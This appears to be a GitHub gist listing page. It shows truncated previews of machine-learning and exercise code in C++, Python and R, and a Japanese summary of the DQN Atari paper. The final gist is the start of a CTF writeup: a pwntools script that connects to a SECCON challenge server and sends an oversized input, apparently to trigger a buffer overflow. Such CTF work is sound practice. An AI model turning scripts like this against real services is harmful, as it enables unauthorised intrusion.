Skip to content

Instantly share code, notes, and snippets.

#include<iostream>
#include<cstdio>
#include<cmath>
#include<vector>
#include "Eigen/Dense"
#include "Eigen/LU"
#define OUTPUT_ENERGY false
#define OUTPUT_A_T false
using namespace std;
# coding:utf-8
import datetime
def main():
while True:
print ">",
raw_input()
if int(datetime.datetime.now().strftime('%H')) > 21:
print "うん、そうだね"
# coding:utf-8
import numpy as np
import math
import random
import matplotlib.pyplot as plt
def sinpi(x):
return math.sin(2*math.pi * x)
def base(x, n):
# coding:utf-8
import numpy as np
import math
import matplotlib.pyplot as plt
import random
dim = 2
data = [((-0.5,-0.3), -1), ((-0.4,-0.2), -1), ((-0.5,0.3), -1) , ((1.0, 1.0), 1), ((1.0, 0.0), 1), ((-0.5, 0.8), 1)]
# coding:utf-8
import numpy as np
import math
import random
import matplotlib.pyplot as plt
dim = 2
#data = [((-0.5,-0.3), -1), ((-0.4,-0.2), -1), ((-0.5,0.3), -1) , ((1.0, 1.0), 1), ((1.0, 0.0), 1), ((-0.5, 0.8), 1)]
def divide(x):
return ((x[0], x[1]), x[2])
# coding:utf-8
import numpy as np
import math
import random
import matplotlib.pyplot as plt
l = [1,8,8,8,1] #regression
weights = []
def sinpi(x):
func <- function(x, n) {
x^(n-1)
}
dataf <- function(x){
sin(2*x*pi) + rnorm(1,sd=0.1)
}
N <- 100
M <- 8
# coding:utf-8
import sys
import random
fieldstr = """
##########
#s.....###
##.##...##
##.####..#
#....##.##

Playing Atari with Deep Reinforcement Learning

論文のポイントを抑えていったものです。(途中どうみてもポイントを抑えるに留まっていない部分がありますが)

Introduction

  • Reinforcement Learning(RL)は高次元の感覚的入力を学習するのに良いが、そのようなシステムの性能は特徴表現に強く依存する。
  • Deep Learningはコンピュータビジョンの分野(Imagenetとか)で大きな成果をあげたり、音声認識で大きな成果をあげた
  • 当然Deep LearningはRLにも応用が期待されるが、Deep Learningの成功は人間によって作られた大量の訓練データに大きく依存し、RLの報酬は、うまく適合しない。というのも、行動と報酬は教師あり学習のように与えられるものでなく、時間的差異がある。
  • また、教師あり学習では、学習データは独立しているが、強化学習においては、似通った状態に連続して遭遇することになる。
  • さらにDeep Learningでは、背後にある確率分布は一定であると仮定されているが、RLでは行動方針の変化とともに、確率分布が変動する。
  • この論文では、たたみ込みニューラルネットによって、これらの困難を高いし、環境から生の映像データを用いることによって、良い方針を学習することを示す。
@moratorium08
moratorium08 / checker.py
Last active December 14, 2016 13:05
writeups
# coding:utf-8
from pwn import *
r = remote("checker.pwn.seccon.jp", 14726)
base = 377
print r.recvuntil("NAME : ")
r.sendline("nao")
print r.recvuntil(">> ")
r.sendline("A" * (base + 6))